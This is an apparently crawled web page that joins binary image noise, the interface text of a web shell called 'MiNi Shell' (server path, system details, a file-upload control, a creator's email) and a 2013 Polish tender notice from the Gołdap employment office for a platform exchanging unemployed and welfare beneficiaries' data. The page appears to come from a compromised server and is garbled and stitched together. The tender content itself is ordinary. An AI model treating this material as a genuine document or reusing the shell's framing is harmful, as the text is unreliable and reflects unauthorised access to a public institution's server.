JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131029/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131029/227395-N-2013.html

<p class="kh_header"><b>Gołdap: Wdrożenie platformy komunikacyjnej</b><br>
<b>Numer ogłoszenia: 227395 - 2013; data zamieszczenia: 29.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Żeromskiego 18, 19-500 Gołdap, woj. warmińsko-mazurskie, tel. 087 6150395, faks 087 6150395.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wdrożenie platformy komunikacyjnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zakup i wdrożenie systemu umożliwiającego dwukierunkową wymianę danych dotyczących beneficjentów obszaru rynku pracy i pomocy społecznej na poziomie lokalnym drogą elektroniczną pomiędzy Powiatowym Urzędem Pracy w Gołdapi i Ośrodkami Pomocy Społecznej w Powiecie Gołdapskim.
2.W Powiecie Gołdapskim system będzie działać w 4 jednostkach, tj. w Powiatowym Urzędzie Pracy w Gołdapi, Ośrodku Pomocy Społecznej w Gołdapi, Gminnym Ośrodku Pomocy Społecznej w Baniach Mazurskich i Gminnym Ośrodku Pomocy Społecznej w Dubeninkach.
3.Zamawiający zastosował model tradycyjny wdrożenia platformy komunikacyjnej polegający na tym, iż w każdym urzędzie postawione są serwery komunikacyjne platformy oraz lokalne repliki bazy danych, które zasilane są z systemów dziedzinowych urzędów. Element centralny stanowi serwer prezentacyjny znajdujący się w powiatowym urzędzie pracy, do którego logują się użytkownicy platformy. 
4.System powinien posiadać co najmniej następującą funkcjonalność:
1/ zapewnienie możliwości wymiany danych pomiędzy Powiatowym Urzędem Pracy a Ośrodkami Pomocy Społecznej, która powinna być realizowana w dwóch trybach:
a/automatycznej wymiany danych w postaci elektronicznej; informacje o beneficjencie powinny być udostępnione po podaniu przez użytkownika końcowego danych jednoznacznie identyfikujących beneficjenta, podstawy prawnej upoważniającej do pozyskania danych, wskazania przeznaczenia dla udostępnionych danych, oznaczenia lub nazwy zbioru, z którego mają być udostępnione dane oraz zakresu informacji zadanych ze zbioru,
b/za pomocą wniosków i zaświadczeń generowanych automatycznie przez platformę, zgodnie z ustawą z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne; zarówno wnioski jak i zaświadczenia powinny być możliwe do opatrzenia bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu użytkownika końcowego,
2/ zapewnienie możliwości definicji/edycji szablonów dokumentów /np. wniosków zaświadczeń itp. zgodnie z oczekiwaniami użytkowników końcowych,
3/ zapewnienie możliwości konfiguracji zakresu danych o beneficjencie, które powinny być udostępnianie w ramach platformy dla poszczególnych urzędów i grup użytkowników końcowych,
4/ zapewnienie interfejsów komunikacyjnych funkcjonujących w oparciu o standard XML, umożliwiających przesyłanie danych z/do systemów dziedzinowych Powiatowego Urzędu Pracy oraz Ośrodków Pomocy Społecznej,
5/ zapewnienie możliwości jednoczesnego przetwarzania kilku zbiorów osobowych należących do różnych administratorów danych osobowych /PUP,OPS/; platforma powinna umożliwiać funkcjonowanie w architekturze rozproszonej tak, aby bazy danych osobowych poszczególnych urzędów były od siebie logicznie i fizycznie odseparowane oraz były możliwe do fizycznego przetrzymywania w obrębie odpowiednich urzędów będących administratorami danych osobowych lub podmiotami przez nie upoważnionymi do przetwarzania danych osobowych,
6/ dostęp do danych osobowych poprzez platformę powinien być nadzorowany i rejestrowany zgodnie z przepisami o ochronie danych osobowych; w szczególności powinien istnieć mechanizm umożliwiający identyfikację użytkownika końcowego uzyskującego dane osobowe, ich zakres, datę i cel ich pozyskania,
7/ zapewnienie możliwości rejestracji zdarzeń systemowych związanych z logowaniem, wylogowaniem, próba zalogowania po podaniu błędnego hasła, zmiana hasła, blokowaniem oraz odblokowaniem użytkownika końcowego w platformie,
8/ platforma powinna funkcjonować wyłącznie w oparciu o dane beneficjentów pochodzące z systemów dziedzinowych Powiatowego Urzędu Pracy /Syriusz STD/ i Ośrodków Pomocy Społecznej /Pomost STD/; nie powinna umożliwiać dodawania, edycji lub usuwania danych beneficjentów.

5.Zakres danych o beneficjencie Powiatowego Urzędu Pracy, który powinien być możliwy do udostępnienia przez platformę automatycznie z systemu  Syriusz STD:
1/ Dane osobowe: nazwisko i imię, PESEL, data i miejsce urodzenia, imię ojca i matki, rodzaj i numer dokumentu tożsamości, płeć, stan cywilny, rodzaj adresu, kod pocztowy, miejscowość, ulica, nr domu, nr lokalu.
2/ Dane osoby, od kiedy, do kiedy, jakie świadczenia i zasiłki ma przyznane i jakie pobrała, czy jest skreślona z ewidencji:
a/ okresy rejestracji w powiatowym urzędzie pracy:
-  data początkowa i końcowa,
-  status osoby na rynku pracy (bezrobotny, poszukujący pracy).
b/ przyznane świadczenia i zasiłki w powiatowym urzędzie pracy:
- nazwa świadczenia/zasiłku,
- data początkowa i końcowa.
c/ zasiłki pobierane w powiatowym urzędzie pracy:
- data początkowa i końcowa,
- wysokość zasiłku brutto i netto.
d/ inne świadczenia pobierane w powiatowym urzędzie pracy:
- data początkowa i końcowa,
 -wysokość świadczenia brutto i netto.
3/ Szkolenia proponowane osobie wraz z informacją o ewentualnej odmowie:
a/data przedłożenia propozycji,
b/czy propozycja przyjęta,
c/czy odmowa uzasadniona,
d/proponowane szkolenie.
4/Szkolenia odbyte przez osobę:
a/data skierowania,
b/zakres tematyczny szkolenia,
c/sposób zakończenia szkolenia /ukończone, przerwane, w trakcie/, 
d/data rozpoczęcia i zakończenia szkolenia.
5/Praca proponowana osobie wraz z informacja o ewentualnej odmowie:
e/data przedłożenia propozycji, 
f/czy propozycja przyjęta,
g/czy odmowa uzasadniona,
h/proponowane stanowisko,
i/rodzaj propozycji.
6/Wykształcenie i kwalifikacje zawodowe osoby:
a/posiadane wykształcenia: rodzaj wykształcenia,
b/zawody wyuczone i wykonywane: nazwa zawodu, informacja o tym, czy jest to zawód wyuczony czy wykonywany,
c/posiadane uprawnienia: nazwa uprawnienia,
d/znajomość języków obcych: nazwa języka obcego, stopień znajomości języka w mowie, piśmie i czytaniu,
e/posiadane umiejętności: nazwa umiejętności.
7/Historia kontaktów osoby z urzędem oraz jego zaplanowane wizyty w urzędzie:
a/rodzaj wizyty w urzędzie,
b/miejsce w urzędzie, gdzie należy /należało/ stawić się na wizytę,
c/data planowanej i faktycznie odbytej wizyty.
8/Historia zatrudnienia:
a/rodzaj zatrudnienia, 
b/data początkowa i końcowa, 
c/nazwa pracodawcy zatrudniającego osobę, 
d/zawód jaki wykonuje osoba zatrudniona, 
e/stanowisko.
9/Historia statusów osoby w powiatowym urzędzie pracy:
a/data zmiany statusu osoby w powiatowym urzędzie pracy,
b/rodzaj, typ i opis statusu.

6.Zakres danych o beneficjencie Ośrodka Pomocy Społecznej, który powinien być możliwy do udostępnienia przez platformę automatycznie z systemu Pomost STD:
1/Dane osobowe: nazwisko i imię, PESEL, data urodzenia, imię ojca i matki,  rodzaj i numer dokumentu tożsamości, płeć, stan cywilny, rodzaj adresu, kod pocztowy, miejscowość, ulica, nr domu, nr lokalu. 
2/ Informacje ogólne o osobie:
a/czy osoba jest zarejestrowana w jednostce organizacyjnej pomocy społecznej,
b/status osoby w jednostce organizacyjnej pomocy społecznej.
3/Przyznane i pobrane świadczenia, zasiłki:
a/nazwa świadczenia/zasiłku,
b/data początkowa i końcowa,
c/wysokość świadczenia/zasiłku brutto i netto.
4/Aktywizacja - udział w projektach
5/wykształcenia i kwalifikacji /wykształcenie, zawód wyuczony i wykonywany, uprawnienia, umiejętności, języki obce/.
7.Wykonawca po wdrożeniu platformy komunikacyjnej zapewni nadzór autorski oraz niezbędne licencje na oprogramowanie systemowe /system aplikacyjny, baza danych/, pod warunkiem, że takie oprogramowanie jest wymagane do pracy w systemie.
8.Wykonawca, po wdrożeniu platformy komunikacyjnej zapozna użytkowników z jej obsługą.
9.Wykonawca, w przypadku zmiany oprogramowania dziedzinowego zapewni aktualność i kompatybilność systemu do dwustronnej komunikacji nie później niż w dniu jego ukazania się aktualizacji do systemów dziedzinowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 48.51.60.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca udokumentuje posiadanie 
doświadczenia poprzez wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - 1 dostawę w zakresie objętym przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy - załącznik nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - Doświadczenie w realizacji dostaw z zakresu przedmiotu zamówienia w okresie ostatnich 3 lat - 35</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.goldap.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Gołdapi, ul. Żeromskiego 18, pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2013 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Gołdapi, 
ul. Żeromskiego 18, I piętro, pokój nr 15 /sekretariat/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com